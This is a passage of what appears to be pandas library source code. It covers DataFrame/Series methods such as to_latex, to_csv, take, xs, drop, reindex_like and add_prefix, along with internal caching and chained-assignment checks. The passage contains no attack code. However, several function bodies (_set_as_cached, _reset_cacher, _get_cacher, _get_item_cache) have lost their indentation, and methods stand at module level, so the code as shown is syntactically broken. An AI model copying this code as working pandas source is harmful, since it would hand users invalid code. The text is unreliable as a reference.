        every multiindex key at each row. By default, the value will be
        read from the config module.
    index_names : bool, default True
        Prints the names of the indexes.
    bold_rows : bool, default False
        Make the row labels bold in the output.
    column_format : str, optional
        The columns format as specified in `LaTeX table format
        <https://en.wikibooks.org/wiki/LaTeX/Tables>`__ e.g. 'rcl' for 3
        columns. By default, 'l' will be used for all columns except
        columns of numbers, which default to 'r'.
    longtable : bool, optional
        By default, the value will be read from the pandas config
        module. Use a longtable environment instead of tabular. Requires
        adding a \usepackage{longtable} to your LaTeX preamble.
    escape : bool, optional
        By default, the value will be read from the pandas config
        module. When set to False prevents from escaping latex special
        characters in column names.
    encoding : str, optional
        A string representing the encoding to use in the output file,
        defaults to 'utf-8'.
    decimal : str, default '.'
        Character recognized as decimal separator, e.g. ',' in Europe.
    multicolumn : bool, default True
        Use \multicolumn to enhance MultiIndex columns.
        The default will be read from the config module.
    multicolumn_format : str, default 'l'
        The alignment for multicolumns, similar to `column_format`
        The default will be read from the config module.
    multirow : bool, default False
        Use \multirow to enhance MultiIndex rows. Requires adding a
        \usepackage{multirow} to your LaTeX preamble. Will print
        centered labels (instead of top-aligned) across the contained
        rows, separating groups via clines. The default will be read
        from the pandas config module.
    caption : str, optional
        The LaTeX caption to be placed inside ``\caption{}`` in the output.

        .. versionadded:: 1.0.0

    label : str, optional
        The LaTeX label to be placed inside ``\label{}`` in the output.
        This is used with ``\ref{}`` in the main ``.tex`` file.

        .. versionadded:: 1.0.0
    %(returns)s
    See Also
    --------
    DataFrame.to_string : Render a DataFrame to a console-friendly
        tabular output.
    DataFrame.to_html : Render a DataFrame as an HTML table.

    Examples
    --------
    >>> df = pd.DataFrame({'name': ['Raphael', 'Donatello'],
    ...                    'mask': ['red', 'purple'],
    ...                    'weapon': ['sai', 'bo staff']})
    >>> print(df.to_latex(index=False))  # doctest: +NORMALIZE_WHITESPACE
    \begin{tabular}{lll}
     \toprule
           name &    mask &    weapon \\
     \midrule
        Raphael &     red &       sai \\
      Donatello &  purple &  bo staff \\
    \bottomrule
    \end{tabular}
    """
    # Series are rendered through their one-column frame view.
    if self.ndim == 1:
        self = self.to_frame()

    # Any LaTeX switch the caller left as None falls back to the
    # corresponding pandas display option.
    get_option = config.get_option
    if longtable is None:
        longtable = get_option("display.latex.longtable")
    if escape is None:
        escape = get_option("display.latex.escape")
    if multicolumn is None:
        multicolumn = get_option("display.latex.multicolumn")
    if multicolumn_format is None:
        multicolumn_format = get_option("display.latex.multicolumn_format")
    if multirow is None:
        multirow = get_option("display.latex.multirow")

    # The formatter handles value rendering; the trailing to_latex call
    # handles the LaTeX-specific layout switches.
    formatter = DataFrameFormatter(
        self,
        columns=columns,
        col_space=col_space,
        na_rep=na_rep,
        header=header,
        index=index,
        formatters=formatters,
        float_format=float_format,
        bold_rows=bold_rows,
        sparsify=sparsify,
        index_names=index_names,
        escape=escape,
        decimal=decimal,
    )
    return formatter.to_latex(
        buf=buf,
        column_format=column_format,
        longtable=longtable,
        encoding=encoding,
        multicolumn=multicolumn,
        multicolumn_format=multicolumn_format,
        multirow=multirow,
        caption=caption,
        label=label,
    )
def to_csv(
    self,
    path_or_buf: Optional[FilePathOrBuffer] = None,
    sep: str = ",",
    na_rep: str = "",
    float_format: Optional[str] = None,
    columns: Optional[Sequence[Label]] = None,
    header: Union[bool_t, List[str]] = True,
    index: bool_t = True,
    index_label: Optional[Union[bool_t, str, Sequence[Label]]] = None,
    mode: str = "w",
    encoding: Optional[str] = None,
    compression: Optional[Union[str, Mapping[str, str]]] = "infer",
    quoting: Optional[int] = None,
    quotechar: str = '"',
    line_terminator: Optional[str] = None,
    chunksize: Optional[int] = None,
    date_format: Optional[str] = None,
    doublequote: bool_t = True,
    escapechar: Optional[str] = None,
    decimal: Optional[str] = ".",
) -> Optional[str]:
    r"""
    Write object to a comma-separated values (csv) file.

    .. versionchanged:: 0.24.0
        The order of arguments for Series was changed.

    Parameters
    ----------
    path_or_buf : str or file handle, default None
        File path or object, if None is provided the result is returned as
        a string.  If a file object is passed it should be opened with
        `newline=''`, disabling universal newlines.

        .. versionchanged:: 0.24.0

           Was previously named "path" for Series.

    sep : str, default ','
        String of length 1. Field delimiter for the output file.
    na_rep : str, default ''
        Missing data representation.
    float_format : str, default None
        Format string for floating point numbers.
    columns : sequence, optional
        Columns to write.
    header : bool or list of str, default True
        Write out the column names. If a list of strings is given it is
        assumed to be aliases for the column names.

        .. versionchanged:: 0.24.0

           Previously defaulted to False for Series.

    index : bool, default True
        Write row names (index).
    index_label : str or sequence, or False, default None
        Column label for index column(s) if desired. If None is given, and
        `header` and `index` are True, then the index names are used. A
        sequence should be given if the object uses MultiIndex. If
        False do not print fields for index names. Use index_label=False
        for easier importing in R.
    mode : str
        Python write mode, default 'w'.
    encoding : str, optional
        A string representing the encoding to use in the output file,
        defaults to 'utf-8'.
    compression : str or dict, default 'infer'
        If str, represents compression mode. If dict, value at 'method' is
        the compression mode. Compression mode may be any of the following
        possible values: {'infer', 'gzip', 'bz2', 'zip', 'xz', None}. If
        compression mode is 'infer' and `path_or_buf` is path-like, then
        detect compression mode from the following extensions: '.gz',
        '.bz2', '.zip' or '.xz'. (otherwise no compression). If dict given
        and mode is 'zip' or inferred as 'zip', other entries passed as
        additional compression options.

        .. versionchanged:: 1.0.0

           May now be a dict with key 'method' as compression mode
           and other entries as additional compression options if
           compression mode is 'zip'.

    quoting : optional constant from csv module
        Defaults to csv.QUOTE_MINIMAL. If you have set a `float_format`
        then floats are converted to strings and thus csv.QUOTE_NONNUMERIC
        will treat them as non-numeric.
    quotechar : str, default '\"'
        String of length 1. Character used to quote fields.
    line_terminator : str, optional
        The newline character or character sequence to use in the output
        file. Defaults to `os.linesep`, which depends on the OS in which
        this method is called ('\n' for linux, '\r\n' for Windows, i.e.).

        .. versionchanged:: 0.24.0

    chunksize : int or None
        Rows to write at a time.
    date_format : str, default None
        Format string for datetime objects.
    doublequote : bool, default True
        Control quoting of `quotechar` inside a field.
    escapechar : str, default None
        String of length 1. Character used to escape `sep` and `quotechar`
        when appropriate.
    decimal : str, default '.'
        Character recognized as decimal separator. E.g. use ',' for
        European data.

    Returns
    -------
    None or str
        If path_or_buf is None, returns the resulting csv format as a
        string. Otherwise returns None.

    See Also
    --------
    read_csv : Load a CSV file into a DataFrame.
    to_excel : Write DataFrame to an Excel file.

    Examples
    --------
    >>> df = pd.DataFrame({'name': ['Raphael', 'Donatello'],
    ...                    'mask': ['red', 'purple'],
    ...                    'weapon': ['sai', 'bo staff']})
    >>> df.to_csv(index=False)
    'name,mask,weapon\nRaphael,red,sai\nDonatello,purple,bo staff\n'

    Create 'out.zip' containing 'out.csv'

    >>> compression_opts = dict(method='zip',
    ...                         archive_name='out.csv')  # doctest: +SKIP
    >>> df.to_csv('out.zip', index=False,
    ...           compression=compression_opts)  # doctest: +SKIP
    """
    from pandas.io.formats.csvs import CSVFormatter

    # Series are written through their single-column frame view; frames
    # pass straight through.
    frame = self.to_frame() if not isinstance(self, ABCDataFrame) else self

    formatter = CSVFormatter(
        frame,
        path_or_buf,
        line_terminator=line_terminator,
        sep=sep,
        encoding=encoding,
        compression=compression,
        quoting=quoting,
        na_rep=na_rep,
        float_format=float_format,
        cols=columns,
        header=header,
        index=index,
        index_label=index_label,
        mode=mode,
        chunksize=chunksize,
        quotechar=quotechar,
        date_format=date_format,
        doublequote=doublequote,
        escapechar=escapechar,
        decimal=decimal,
    )
    formatter.save()

    # When writing to a real target there is nothing to hand back; with no
    # target the formatter buffered the csv text for the caller.
    if path_or_buf is not None:
        return None
    return formatter.path_or_buf.getvalue()
# ----------------------------------------------------------------------
# Lookup Caching
def _set_as_cached(self, item, cacher) -> None:
"""
Set the _cacher attribute on the calling object with a weakref to
cacher.
"""
self._cacher = (item, weakref.ref(cacher))
def _reset_cacher(self) -> None:
"""
Reset the cacher.
"""
if hasattr(self, "_cacher"):
del self._cacher
def _maybe_cache_changed(self, item, value) -> None:
    """
    The object has called back to us saying maybe it has changed.

    Writes ``value`` back into this (parent) object's block manager under
    the ``item`` label, so the parent reflects a mutation made through a
    cached child.
    """
    self._data.set(item, value)
@property
def _is_cached(self) -> bool_t:
    """Return boolean indicating if self is cached or not."""
    # ``_cacher`` only exists after _set_as_cached has run.
    cacher = getattr(self, "_cacher", None)
    return cacher is not None
def _get_cacher(self):
"""return my cacher or None"""
cacher = getattr(self, "_cacher", None)
if cacher is not None:
cacher = cacher[1]()
return cacher
def _maybe_update_cacher(
    self, clear: bool_t = False, verify_is_copy: bool_t = True
) -> None:
    """
    See if we need to update our parent cacher if clear, then clear our
    cache.

    Called after this object may have been mutated, so the parent object
    it was cached from (if any) can be told to refresh its copy.

    Parameters
    ----------
    clear : bool, default False
        Clear the item cache.
    verify_is_copy : bool, default True
        Provide is_copy checks.
    """
    cacher = getattr(self, "_cacher", None)
    if cacher is not None:
        # Dereference the weakref to our parent.
        ref = cacher[1]()

        # we are trying to reference a dead referant, hence
        # a copy
        if ref is None:
            del self._cacher
        else:
            # Note: we need to call ref._maybe_cache_changed even in the
            # case where it will raise. (Uh, not clear why)
            try:
                ref._maybe_cache_changed(cacher[0], self)
            except AssertionError:
                # ref._data.setitem can raise
                # AssertionError because of shape mismatch
                pass

    if verify_is_copy:
        # May emit a SettingWithCopyWarning (or raise, per the
        # mode.chained_assignment option).
        self._check_setitem_copy(stacklevel=5, t="referant")

    if clear:
        self._clear_item_cache()
def _clear_item_cache(self) -> None:
    # Invalidate every cached label -> child-object entry so stale
    # children are not handed out after a mutation.
    self._item_cache.clear()
# ----------------------------------------------------------------------
# Indexing Methods
def take(
    self: FrameOrSeries, indices, axis=0, is_copy: Optional[bool_t] = None, **kwargs
) -> FrameOrSeries:
    """
    Return the elements in the given *positional* indices along an axis.

    This means that we are not indexing according to actual values in
    the index attribute of the object. We are indexing according to the
    actual position of the element in the object.

    Parameters
    ----------
    indices : array-like
        An array of ints indicating which positions to take.
    axis : {0 or 'index', 1 or 'columns', None}, default 0
        The axis on which to select elements. ``0`` means that we are
        selecting rows, ``1`` means that we are selecting columns.
    is_copy : bool
        Before pandas 1.0, ``is_copy=False`` can be specified to ensure
        that the return value is an actual copy. Starting with pandas 1.0,
        ``take`` always returns a copy, and the keyword is therefore
        deprecated.

        .. deprecated:: 1.0.0

    **kwargs
        For compatibility with :meth:`numpy.take`. Has no effect on the
        output.

    Returns
    -------
    taken : same type as caller
        An array-like containing the elements taken from the object.

    See Also
    --------
    DataFrame.loc : Select a subset of a DataFrame by labels.
    DataFrame.iloc : Select a subset of a DataFrame by positions.
    numpy.take : Take elements from an array along an axis.

    Examples
    --------
    >>> df = pd.DataFrame([('falcon', 'bird', 389.0),
    ...                    ('parrot', 'bird', 24.0),
    ...                    ('lion', 'mammal', 80.5),
    ...                    ('monkey', 'mammal', np.nan)],
    ...                   columns=['name', 'class', 'max_speed'],
    ...                   index=[0, 2, 3, 1])
    >>> df
         name   class  max_speed
    0  falcon    bird      389.0
    2  parrot    bird       24.0
    3    lion  mammal       80.5
    1  monkey  mammal        NaN

    Take elements at positions 0 and 3 along the axis 0 (default).

    Note how the actual indices selected (0 and 1) do not correspond to
    our selected indices 0 and 3. That's because we are selecting the 0th
    and 3rd rows, not rows whose indices equal 0 and 3.

    >>> df.take([0, 3])
         name   class  max_speed
    0  falcon    bird      389.0
    1  monkey  mammal        NaN

    Take elements at indices 1 and 2 along the axis 1 (column selection).

    >>> df.take([1, 2], axis=1)
        class  max_speed
    0    bird      389.0
    2    bird       24.0
    3  mammal       80.5
    1  mammal        NaN

    We may take elements using negative integers for positive indices,
    starting from the end of the object, just like with Python lists.

    >>> df.take([-1, -2])
         name   class  max_speed
    1  monkey  mammal        NaN
    3    lion  mammal       80.5
    """
    if is_copy is not None:
        # The keyword is meaningless as of pandas 1.0: 'take' always copies.
        warnings.warn(
            "is_copy is deprecated and will be removed in a future version. "
            "'take' always returns a copy, so there is no need to specify this.",
            FutureWarning,
            stacklevel=2,
        )

    # Reject any unsupported numpy-compat keyword arguments.
    nv.validate_take(tuple(), kwargs)

    self._consolidate_inplace()

    # Translate the user-facing axis number into the block-manager axis.
    mgr_axis = self._get_block_manager_axis(axis)
    taken = self._data.take(indices, axis=mgr_axis, verify=True)
    return self._constructor(taken).__finalize__(self)
def _take_with_is_copy(self: FrameOrSeries, indices, axis=0) -> FrameOrSeries:
    """
    Internal version of the `take` method that sets the `_is_copy`
    attribute to keep track of the parent dataframe (using in indexing
    for the SettingWithCopyWarning).

    See the docstring of `take` for full explanation of the parameters.
    """
    result = self.take(indices=indices, axis=axis)

    # Maybe set copy if we didn't actually change the index: only when the
    # axis labels changed do we record the parent for copy tracking.
    labels_unchanged = result._get_axis(axis).equals(self._get_axis(axis))
    if not labels_unchanged:
        result._set_is_copy(self)
    return result
def xs(self, key, axis=0, level=None, drop_level: bool_t = True):
    """
    Return cross-section from the Series/DataFrame.

    This method takes a `key` argument to select data at a particular
    level of a MultiIndex.

    Parameters
    ----------
    key : label or tuple of label
        Label contained in the index, or partially in a MultiIndex.
    axis : {0 or 'index', 1 or 'columns'}, default 0
        Axis to retrieve cross-section on.
    level : object, defaults to first n levels (n=1 or len(key))
        In case of a key partially contained in a MultiIndex, indicate
        which levels are used. Levels can be referred by label or position.
    drop_level : bool, default True
        If False, returns object with same levels as self.

    Returns
    -------
    Series or DataFrame
        Cross-section from the original Series or DataFrame
        corresponding to the selected index levels.

    See Also
    --------
    DataFrame.loc : Access a group of rows and columns
        by label(s) or a boolean array.
    DataFrame.iloc : Purely integer-location based indexing
        for selection by position.

    Notes
    -----
    `xs` can not be used to set values.

    MultiIndex Slicers is a generic way to get/set values on
    any level or levels.
    It is a superset of `xs` functionality, see
    :ref:`MultiIndex Slicers <advanced.mi_slicers>`.

    Examples
    --------
    >>> d = {'num_legs': [4, 4, 2, 2],
    ...      'num_wings': [0, 0, 2, 2],
    ...      'class': ['mammal', 'mammal', 'mammal', 'bird'],
    ...      'animal': ['cat', 'dog', 'bat', 'penguin'],
    ...      'locomotion': ['walks', 'walks', 'flies', 'walks']}
    >>> df = pd.DataFrame(data=d)
    >>> df = df.set_index(['class', 'animal', 'locomotion'])
    >>> df
                               num_legs  num_wings
    class  animal  locomotion
    mammal cat     walks              4          0
           dog     walks              4          0
           bat     flies              2          2
    bird   penguin walks              2          2

    Get values at specified index

    >>> df.xs('mammal')
                       num_legs  num_wings
    animal locomotion
    cat    walks              4          0
    dog    walks              4          0
    bat    flies              2          2

    Get values at several indexes

    >>> df.xs(('mammal', 'dog'))
                num_legs  num_wings
    locomotion
    walks              4          0

    Get values at specified index and level

    >>> df.xs('cat', level=1)
                       num_legs  num_wings
    class  locomotion
    mammal walks              4          0

    Get values at several indexes and levels

    >>> df.xs(('bird', 'walks'),
    ...       level=[0, 'locomotion'])
             num_legs  num_wings
    animal
    penguin         2          2

    Get values at specified column and axis

    >>> df.xs('num_wings', axis=1)
    class   animal   locomotion
    mammal  cat      walks         0
            dog      walks         0
            bat      flies         2
    bird    penguin  walks         2
    Name: num_wings, dtype: int64
    """
    axis = self._get_axis_number(axis)
    labels = self._get_axis(axis)

    # Explicit-level path: resolve the key at the requested MultiIndex
    # level(s) and index positionally along that single axis.
    if level is not None:
        loc, new_ax = labels.get_loc_level(key, level=level, drop_level=drop_level)

        # create the tuple of the indexer
        _indexer = [slice(None)] * self.ndim
        _indexer[axis] = loc
        indexer = tuple(_indexer)

        result = self.iloc[indexer]
        # Re-attach the (possibly level-dropped) axis labels.
        setattr(result, result._get_axis_name(axis), new_ax)
        return result

    # Column cross-section is plain column selection.
    if axis == 1:
        return self[key]

    self._consolidate_inplace()

    index = self.index
    if isinstance(index, MultiIndex):
        loc, new_index = self.index.get_loc_level(key, drop_level=drop_level)
    else:
        # ``loc`` may come back as a scalar position, a slice, or a
        # (boolean or integer) ndarray depending on the index type.
        loc = self.index.get_loc(key)

        if isinstance(loc, np.ndarray):
            if loc.dtype == np.bool_:
                (inds,) = loc.nonzero()
                return self._take_with_is_copy(inds, axis=axis)
            else:
                return self._take_with_is_copy(loc, axis=axis)

        if not is_scalar(loc):
            new_index = self.index[loc]

    if is_scalar(loc):
        # In this case loc should be an integer
        if self.ndim == 1:
            # if we encounter an array-like and we only have 1 dim
            # that means that there are list/ndarrays inside the Series!
            # so just return them (GH 6394)
            return self._values[loc]

        # Single row of a frame: hand back a Series over the columns.
        new_values = self._data.fast_xs(loc)

        result = self._constructor_sliced(
            new_values,
            index=self.columns,
            name=self.index[loc],
            dtype=new_values.dtype,
        )

    else:
        result = self.iloc[loc]
        result.index = new_index

    # this could be a view
    # but only in a single-dtyped view sliceable case
    result._set_is_copy(self, copy=not result._is_view)

    return result

# Alias kept for internal callers that reference the private name.
_xs: Callable = xs
def __getitem__(self, item):
    # Abstract: concrete subclasses (Series/DataFrame) must implement
    # label-based item access.
    raise AbstractMethodError(self)
def _get_item_cache(self, item):
"""Return the cached item, item represents a label indexer."""
cache = self._item_cache
res = cache.get(item)
if res is None:
values = self._data.get(item)
res = self._box_item_values(item, values)
cache[item] = res
res._set_as_cached(item, self)
# for a chain
res._is_copy = self._is_copy
return res
def _box_item_values(self, key, values):
    # Abstract: subclasses wrap raw block-manager values into a pandas
    # object (e.g. a Series for a DataFrame column).
    raise AbstractMethodError(self)
def _slice(self: FrameOrSeries, slobj: slice, axis=0) -> FrameOrSeries:
    """
    Construct a slice of this container.

    Slicing with this method is *always* positional.
    """
    assert isinstance(slobj, slice), type(slobj)

    mgr_axis = self._get_block_manager_axis(axis)
    sliced = self._constructor(self._data.get_slice(slobj, axis=mgr_axis))
    sliced = sliced.__finalize__(self)

    # this could be a view
    # but only in a single-dtyped view sliceable case
    result_is_copy = axis != 0 or sliced._is_view
    sliced._set_is_copy(self, copy=result_is_copy)
    return sliced
def _set_item(self, key, value) -> None:
    # Write through to the block manager, then drop cached children so a
    # stale view of ``key`` is never handed out afterwards.
    self._data.set(key, value)
    self._clear_item_cache()
def _set_is_copy(self, ref, copy: bool_t = True) -> None:
    """Record (via weakref) the parent object ``self`` may be a copy of."""
    if copy:
        assert ref is not None
        self._is_copy = weakref.ref(ref)
    else:
        self._is_copy = None
def _check_is_chained_assignment_possible(self) -> bool_t:
    """
    Check if we are a view, have a cacher, and are of mixed type.
    If so, then force a setitem_copy check.

    Should be called just near setting a value.

    Returns True when we are a cached view (so the cacher should be
    updated after the setting), False otherwise.
    """
    if self._is_view and self._is_cached:
        ref = self._get_cacher()
        # Mixed-type parents cannot share memory with us, so a write here
        # would silently miss the parent: force the warning/raise.
        if ref is not None and ref._is_mixed_type:
            self._check_setitem_copy(stacklevel=4, t="referant", force=True)
        return True
    elif self._is_copy:
        self._check_setitem_copy(stacklevel=4, t="referant")
    return False
def _check_setitem_copy(self, stacklevel=4, t="setting", force=False):
    """
    Parameters
    ----------
    stacklevel : int, default 4
        the level to show of the stack when the error is output
    t : str, the type of setting error
    force : bool, default False
        If True, then force showing an error.

    validate if we are doing a setitem on a chained copy.

    If you call this function, be sure to set the stacklevel such that the
    user will see the error *at the level of setting*

    It is technically possible to figure out that we are setting on
    a copy even WITH a multi-dtyped pandas object. In other words, some
    blocks may be views while other are not. Currently _is_view will ALWAYS
    return False for multi-blocks to avoid having to handle this case.

    df = DataFrame(np.arange(0,9), columns=['count'])
    df['group'] = 'b'

    # This technically need not raise SettingWithCopy if both are view
    # (which is not # generally guaranteed but is usually True.  However,
    # this is in general not a good practice and we recommend using .loc.
    df.iloc[0:5]['group'] = 'a'
    """
    # return early if the check is not needed
    if not (force or self._is_copy):
        return

    value = config.get_option("mode.chained_assignment")
    if value is None:
        return

    # see if the copy is not actually referred; if so, then dissolve
    # the copy weakref
    if self._is_copy is not None and not isinstance(self._is_copy, str):
        # ``_is_copy`` is a weakref here; calling it yields the referent
        # or None if it has been garbage-collected.
        r = self._is_copy()
        if not gc.get_referents(r) or r.shape == self.shape:
            self._is_copy = None
            return

    # a custom message
    if isinstance(self._is_copy, str):
        t = self._is_copy
    elif t == "referant":
        t = (
            "\n"
            "A value is trying to be set on a copy of a slice from a "
            "DataFrame\n\n"
            "See the caveats in the documentation: "
            "https://pandas.pydata.org/pandas-docs/stable/user_guide/"
            "indexing.html#returning-a-view-versus-a-copy"
        )
    else:
        t = (
            "\n"
            "A value is trying to be set on a copy of a slice from a "
            "DataFrame.\n"
            "Try using .loc[row_indexer,col_indexer] = value "
            "instead\n\nSee the caveats in the documentation: "
            "https://pandas.pydata.org/pandas-docs/stable/user_guide/"
            "indexing.html#returning-a-view-versus-a-copy"
        )

    if value == "raise":
        raise com.SettingWithCopyError(t)
    elif value == "warn":
        warnings.warn(t, com.SettingWithCopyWarning, stacklevel=stacklevel)
def __delitem__(self, key) -> None:
    """
    Delete item (``del obj[key]``).
    """
    deleted = False

    maybe_shortcut = False
    if self.ndim == 2 and isinstance(self.columns, MultiIndex):
        try:
            # ``in`` raises TypeError for unhashable keys; treat that
            # as "no shortcut possible".
            maybe_shortcut = key not in self.columns._engine
        except TypeError:
            pass

    if maybe_shortcut:
        # Allow shorthand to delete all columns whose first len(key)
        # elements match key:
        if not isinstance(key, tuple):
            key = (key,)
        for col in self.columns:
            if isinstance(col, tuple) and col[: len(key)] == key:
                del self[col]
                deleted = True
    if not deleted:
        # If the above loop ran and didn't delete anything because
        # there was no match, this call should raise the appropriate
        # exception:
        self._data.delete(key)

    # delete from the caches
    try:
        del self._item_cache[key]
    except KeyError:
        pass
# ----------------------------------------------------------------------
# Unsorted
def get(self, key, default=None):
    """
    Return the value for ``key`` (ex: DataFrame column), or ``default``
    when the key cannot be resolved.

    Parameters
    ----------
    key : object

    Returns
    -------
    value : same type as items contained in object
    """
    try:
        result = self[key]
    except (KeyError, ValueError, IndexError):
        return default
    return result
@property
def _is_view(self) -> bool_t:
    """Return boolean indicating if self is view of another array """
    # Delegates to the block manager's view-tracking flag.
    return self._data.is_view
def reindex_like(
    self: FrameOrSeries,
    other,
    method: Optional[str] = None,
    copy: bool_t = True,
    limit=None,
    tolerance=None,
) -> FrameOrSeries:
    """
    Return an object with matching indices as other object.

    Conform the object to the same index on all axes. Optional
    filling logic, placing NaN in locations having no value
    in the previous index. A new object is produced unless the
    new index is equivalent to the current one and copy=False.

    Parameters
    ----------
    other : Object of the same data type
        Its row and column indices are used to define the new indices
        of this object.
    method : {None, 'backfill'/'bfill', 'pad'/'ffill', 'nearest'}
        Method to use for filling holes in reindexed DataFrame.
        Please note: this is only applicable to DataFrames/Series with a
        monotonically increasing/decreasing index.

        * None (default): don't fill gaps
        * pad / ffill: propagate last valid observation forward to next
          valid
        * backfill / bfill: use next valid observation to fill gap
        * nearest: use nearest valid observations to fill gap.
    copy : bool, default True
        Return a new object, even if the passed indexes are the same.
    limit : int, default None
        Maximum number of consecutive labels to fill for inexact matches.
    tolerance : optional
        Maximum distance between original and new labels for inexact
        matches. The values of the index at the matching locations most
        satisfy the equation ``abs(index[indexer] - target) <= tolerance``.

        Tolerance may be a scalar value, which applies the same tolerance
        to all values, or list-like, which applies variable tolerance per
        element. List-like includes list, tuple, array, Series, and must be
        the same size as the index and its dtype must exactly match the
        index's type.

        .. versionadded:: 0.21.0 (list-like tolerance)

    Returns
    -------
    Series or DataFrame
        Same type as caller, but with changed indices on each axis.

    See Also
    --------
    DataFrame.set_index : Set row labels.
    DataFrame.reset_index : Remove row labels or move them to new columns.
    DataFrame.reindex : Change to new indices or expand indices.

    Notes
    -----
    Same as calling
    ``.reindex(index=other.index, columns=other.columns,...)``.

    Examples
    --------
    >>> df1 = pd.DataFrame([[24.3, 75.7, 'high'],
    ...                     [31, 87.8, 'high'],
    ...                     [22, 71.6, 'medium'],
    ...                     [35, 95, 'medium']],
    ...                    columns=['temp_celsius', 'temp_fahrenheit',
    ...                             'windspeed'],
    ...                    index=pd.date_range(start='2014-02-12',
    ...                                        end='2014-02-15', freq='D'))

    >>> df1
                temp_celsius  temp_fahrenheit windspeed
    2014-02-12          24.3             75.7      high
    2014-02-13          31.0             87.8      high
    2014-02-14          22.0             71.6    medium
    2014-02-15          35.0             95.0    medium

    >>> df2 = pd.DataFrame([[28, 'low'],
    ...                     [30, 'low'],
    ...                     [35.1, 'medium']],
    ...                    columns=['temp_celsius', 'windspeed'],
    ...                    index=pd.DatetimeIndex(['2014-02-12', '2014-02-13',
    ...                                            '2014-02-15']))

    >>> df2
                temp_celsius windspeed
    2014-02-12          28.0       low
    2014-02-13          30.0       low
    2014-02-15          35.1    medium

    >>> df2.reindex_like(df1)
                temp_celsius  temp_fahrenheit windspeed
    2014-02-12          28.0              NaN       low
    2014-02-13          30.0              NaN       low
    2014-02-14           NaN              NaN       NaN
    2014-02-15          35.1              NaN    medium
    """
    # Build the per-axis keyword arguments from *other*'s labels and
    # delegate the actual work to ``reindex``.
    d = other._construct_axes_dict(
        axes=self._AXIS_ORDERS,
        method=method,
        copy=copy,
        limit=limit,
        tolerance=tolerance,
    )

    return self.reindex(**d)
def drop(
    self,
    labels=None,
    axis=0,
    index=None,
    columns=None,
    level=None,
    inplace: bool_t = False,
    errors: str = "raise",
):
    """
    Drop the given labels from the requested axis.

    Accepts either ``labels`` + ``axis``, or the axis-specific ``index`` /
    ``columns`` keywords (mutually exclusive with ``labels``). When
    ``inplace`` is True, ``self`` is updated and ``None`` is returned;
    otherwise the pruned object is returned.
    """
    inplace = validate_bool_kwarg(inplace, "inplace")

    if labels is not None:
        if index is not None or columns is not None:
            raise ValueError("Cannot specify both 'labels' and 'index'/'columns'")
        axis_name = self._get_axis_name(axis)
        axes = {axis_name: labels}
    elif index is not None or columns is not None:
        axes, _ = self._construct_axes_from_arguments((index, columns), {})
    else:
        raise ValueError(
            "Need to specify at least one of 'labels', 'index' or 'columns'"
        )

    obj = self

    # Drop along each axis that was actually requested.
    for axis, labels in axes.items():
        if labels is not None:
            obj = obj._drop_axis(labels, axis, level=level, errors=errors)

    if inplace:
        self._update_inplace(obj)
    else:
        return obj
def _drop_axis(
    self: FrameOrSeries, labels, axis, level=None, errors: str = "raise"
) -> FrameOrSeries:
    """
    Drop labels from specified axis. Used in the ``drop`` method
    internally.

    Parameters
    ----------
    labels : single label or list-like
    axis : int or axis name
    level : int or level name, default None
        For MultiIndex
    errors : {'ignore', 'raise'}, default 'raise'
        If 'ignore', suppress error and existing labels are dropped.
    """
    axis = self._get_axis_number(axis)
    axis_name = self._get_axis_name(axis)
    axis = self._get_axis(axis)

    if axis.is_unique:
        # Unique axis: Index.drop handles missing labels per ``errors``.
        if level is not None:
            if not isinstance(axis, MultiIndex):
                raise AssertionError("axis must be a MultiIndex")
            new_axis = axis.drop(labels, level=level, errors=errors)
        else:
            new_axis = axis.drop(labels, errors=errors)
        result = self.reindex(**{axis_name: new_axis})

    # Case for non-unique axis
    else:
        # Build a boolean mask of rows/columns to keep instead of
        # reindexing, since duplicate labels cannot be reindexed.
        labels = ensure_object(com.index_labels_to_array(labels))
        if level is not None:
            if not isinstance(axis, MultiIndex):
                raise AssertionError("axis must be a MultiIndex")
            indexer = ~axis.get_level_values(level).isin(labels)

            # GH 18561 MultiIndex.drop should raise if label is absent
            if errors == "raise" and indexer.all():
                raise KeyError(f"{labels} not found in axis")
        else:
            indexer = ~axis.isin(labels)
            # Check if label doesn't exist along axis
            labels_missing = (axis.get_indexer_for(labels) == -1).any()
            if errors == "raise" and labels_missing:
                raise KeyError(f"{labels} not found in axis")

        slicer = [slice(None)] * self.ndim
        slicer[self._get_axis_number(axis_name)] = indexer

        result = self.loc[tuple(slicer)]

    return result
def _update_inplace(self, result, verify_is_copy: bool_t = True) -> None:
    """
    Replace self internals with result.

    Parameters
    ----------
    result : object
        Either an object exposing ``_data``, or a raw block manager
        (the ``getattr`` fallback below accepts both).
    verify_is_copy : bool, default True
        Provide is_copy checks.
    """
    # NOTE: This does *not* call __finalize__ and that's an explicit
    # decision that we may revisit in the future.
    self._reset_cache()
    self._clear_item_cache()
    self._data = getattr(result, "_data", result)
    self._maybe_update_cacher(verify_is_copy=verify_is_copy)
def add_prefix(self: FrameOrSeries, prefix: str) -> FrameOrSeries:
    """
    Prefix labels with string `prefix`.

    For Series, the row labels are prefixed.
    For DataFrame, the column labels are prefixed.

    Parameters
    ----------
    prefix : str
        The string to add before each label.

    Returns
    -------
    Series or DataFrame
        New Series or DataFrame with updated labels.

    See Also
    --------
    Series.add_suffix: Suffix row labels with string `suffix`.
    DataFrame.add_suffix: Suffix column labels with string `suffix`.

    Examples
    --------
    >>> s = pd.Series([1, 2, 3, 4])
    >>> s
    0    1
    1    2
    2    3
    3    4
    dtype: int64

    >>> s.add_prefix('item_')
    item_0    1
    item_1    2
    item_2    3
    item_3    4
    dtype: int64

    >>> df = pd.DataFrame({'A': [1, 2, 3, 4], 'B': [3, 4, 5, 6]})
    >>> df
       A  B
    0  1  3
    1  2  4
    2  3  5
    3  4  6

    >>> df.add_prefix('col_')
         col_A  col_B
    0       1       3
    1       2       4
    2       3       5
    3       4       6
    """
    # Bind ``prefix`` so each label is rendered as f"{prefix}{label}".
    f = functools.partial("{prefix}{}".format, prefix=prefix)

    # Rename along the info axis: rows for Series, columns for DataFrame.
    mapper = {self._info_axis_name: f}
    return self.rename(**mapper)  # type: ignore
def add_suffix(self: FrameOrSeries, suffix: str) -> FrameOrSeries:
    """
    Suffix labels with string `suffix`.

    For Series, the row labels are suffixed.
    For DataFrame, the column labels are suffixed.

    Parameters
    ----------
    suffix : str
        The string to add after each label.

    Returns
    -------
    Series or DataFrame
        New Series or DataFrame with updated labels.

    See Also
    --------
    Series.add_prefix: Prefix row labels with string `prefix`.
    DataFrame.add_prefix: Prefix column labels with string `prefix`.

    Examples
    --------
    >>> s = pd.Series([1, 2, 3, 4])
    >>> s
    0    1
